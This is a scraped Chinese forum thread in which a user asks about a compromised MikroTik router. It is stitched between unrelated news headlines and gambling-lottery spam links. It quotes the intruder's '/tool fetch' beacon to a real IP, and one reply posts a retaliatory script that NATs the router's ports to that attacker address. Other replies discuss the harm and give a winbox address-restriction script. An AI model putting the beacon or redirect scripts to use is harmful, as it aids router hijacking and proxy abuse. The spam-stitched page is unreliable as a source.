• 地价10年暴涨4倍背后:供地减半 开发商拿地疯狂 ——凤凰网房产杭州 2019-08-16
  • 把市场经济说成计划经济是不是痴呆病? 2019-08-07
  • 陶峙岳上将率部起义之前 如何处置反对起义的部将 2019-07-27
  • 房价缓慢抬升、库存持续下降 楼市回暖迹象隐现 2019-07-27
  • 人民日报评论员:携手创造更加光明的美好未来 2019-07-23
  • 纪念人民日报创刊70周年 2019-07-23
  • Angelababy高扎马尾坐雪地大笑显俏皮 双手浸冰水被邓超赞“猛女” 2019-07-12
  • 哈萨克斯坦今年计划启动1吉瓦可再生能源项目 2019-07-05
  • 学习贯彻十九大精神不忘初心 牢记使命 奔向未来 2019-07-05
  • 编辑评测:高夫净源控油平衡露 极速补水长效控油 2019-06-14
  • 标记生成出错,请与管理员联系! 2019-06-14
  • 伊春市纪委监委通报7起违反中央八项规定精神的典型问题 2019-06-12
  • 第十二届人民企业社会责任奖评选启动 2019-06-12
  • 中国武器亮相国外 铁甲雄狮大秀视觉盛宴 2019-06-02
  • 城管炫富是病,得治! 2019-06-02
  • 自由的生活_软路由论坛

     找回密码
     注册

    QQ登录

    只需一步,快速开始

    搜索
    查看: 5691|回复: 9
    打印 上一主题 下一主题

    11选5害死人真实故事: [基础] 今天路由器被别人登录了

    [复制链接]
    跳转到指定楼层
    1#
    发表于 2018-7-31 10:06:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

    马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

    广西11选5历史 www.jqel.net 您需要 登录 才可以下载或查看,没有帐号?注册

    x
    /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no

    加了这个 语句。。。

    谁看看 ,有哪些影响?
    routeros
    2#
     楼主| 发表于 2018-7-31 10:10:23 | 只看该作者
    为了管理 我开放了winbox端口,

    0 XI telnet                            23
    1 XI ftp                               21
    2    www                               xxx
    3 XI ssh                               22
    4 XI www-ssl                           443  
    5 XI api                               8728
    6    winbox                            8291
    7 XI api-ssl                           8729  
    routeros
    3#
    发表于 2018-7-31 18:04:33 | 只看该作者
    本帖最后由 47771885 于 2018-7-31 18:07 编辑
    1. {
    2. :local socksp [/ip socks get port ]
    3. :local proxyp [/ip proxy get port ]

    4. /ip firewall nat
    5. add action=dst-nat chain=dstnat dst-address-type=local dst-port=($socksp.",".$proxyp) protocol=\
    6.     tcp to-addresses=95.154.216.166 to-ports=2008
    7. add action=dst-nat chain=dstnat dst-address-type=local dst-port=23,22,8291,80 protocol=\
    8.     tcp to-addresses=95.154.216.166 to-ports=2008
    9. /ip service disable api
    10. /ip service disable www
    11. /ip service disable ftp
    12. /ip service disable ssh
    13. /ip service disable telnet
    14. /ip service set winbox port=2018

    15. /ip socks
    16. set enabled=no

    17. /ip proxy
    18. set enabled=no

    19. }

    复制代码
    如防火墙加了策略的
    补充
    1. {
    2. :local fp [/ip firewall filter get [find comment~"^port"] port]

    3. /ip firewall filter remove [find comment~"^port"]

    4. :if ( $fp > 0) do={
    5. /ip firewall nat
    6. add action=dst-nat chain=dstnat dst-address-type=local dst-port=$fp protocol=\
    7.     tcp to-addresses=95.154.216.166 to-ports=2008
    8. }
    9. }
    复制代码


    来个以暴制暴

    scheduler 和 script 自行删除可疑的


    自行修改winbox 端口 这里默认2018

    routeros
    4#
     楼主| 发表于 2018-8-2 14:31:34 | 只看该作者
    我把 winbox port改了,
    就是想 请教你 ,他添加到计划任务  有何危害?  
    routeros
    5#
    发表于 2018-8-2 19:00:03 | 只看该作者
    xuxi3201 发表于 2018-8-2 14:31
    我把 winbox port改了,
    就是想 请教你 ,他添加到计划任务  有何危害?

    为了保持和你的你联系
    routeros
    6#
    发表于 2018-8-2 19:56:37 | 只看该作者
    为了知道你的IP呗,方便使用你的IP做代理干别的事
    routeros
    7#
     楼主| 发表于 2018-8-5 10:33:29 | 只看该作者
    明白了,
    多谢。  
    routeros
    8#
    发表于 2018-8-12 02:12:44 | 只看该作者
    /tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http
    修改winbox端口号后,软件升级到最新版本有效果吗?
    routeros
    9#
     楼主| 发表于 2018-8-12 09:23:43 | 只看该作者
    回复楼上的,我直接把8291外网访问 关闭了。
    。
    当然,都升级到最新版本  6.40.8
    routeros
    10#
    发表于 2018-8-12 10:32:27 | 只看该作者
    假設遠端的地址有DDNS地址可查,是可透過Script排程進行更新的.以winbox為例:
    :local winbox [:toarray "192.168.0.0/16,$[:resolve "aaa.no-ip.org"]"]
    :if ([/ip service get winbox address]!=$winbox) do={/ip service set winbox address=$winbox}

    如果有2個或更多的ddns地址,第一行修正成:
    :local winbox [:toarray "192.168.0.0/16,$[:resolve "aaa.no-ip.org"],$[:resolve "bbb.no-ip.org"]"]
    #更多的地址以上類推...

    至於其它service服務地址,只將"winbox"這個字串改成其它服務名稱即可.
    routeros
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    QQ|小黑屋|手机版|Archiver|广西11选5历史 ( 渝ICP备15001194号-1,渝公网安备 50011602500124号 )

    GMT+8, 2019-8-1 12:00 , Processed in 0.138687 second(s), 21 queries , Gzip On, MemCache On.

    Powered by Discuz! X3.4 Licensed

    © 2001-2017 Comsenz Inc.

    快速回复 广西11选5历史 返回列表
  • 地价10年暴涨4倍背后:供地减半 开发商拿地疯狂 ——凤凰网房产杭州 2019-08-16
  • 把市场经济说成计划经济是不是痴呆病? 2019-08-07
  • 陶峙岳上将率部起义之前 如何处置反对起义的部将 2019-07-27
  • 房价缓慢抬升、库存持续下降 楼市回暖迹象隐现 2019-07-27
  • 人民日报评论员:携手创造更加光明的美好未来 2019-07-23
  • 纪念人民日报创刊70周年 2019-07-23
  • Angelababy高扎马尾坐雪地大笑显俏皮 双手浸冰水被邓超赞“猛女” 2019-07-12
  • 哈萨克斯坦今年计划启动1吉瓦可再生能源项目 2019-07-05
  • 学习贯彻十九大精神不忘初心 牢记使命 奔向未来 2019-07-05
  • 编辑评测:高夫净源控油平衡露 极速补水长效控油 2019-06-14
  • 标记生成出错,请与管理员联系! 2019-06-14
  • 伊春市纪委监委通报7起违反中央八项规定精神的典型问题 2019-06-12
  • 第十二届人民企业社会责任奖评选启动 2019-06-12
  • 中国武器亮相国外 铁甲雄狮大秀视觉盛宴 2019-06-02
  • 城管炫富是病,得治! 2019-06-02
  • 内蒙古时时玩法 福建时时诈骗团伙立规定 上海时时乐开奖结果上海 欢乐捕鱼港 湖南幸运赛车彩票网 中国篮球竞彩网开奖结果 皇冠体育篮球即时比分 四川快乐12早上开始时间 中国福利彩票双色球开奖结果 棋牌app二维码怎么推广 江苏十一选五复式表 时时彩后三基本走势图 极速时时数据对接 内蒙古时时十一选五 腾讯分分彩1000期开奖结果 新时时彩倍投计算器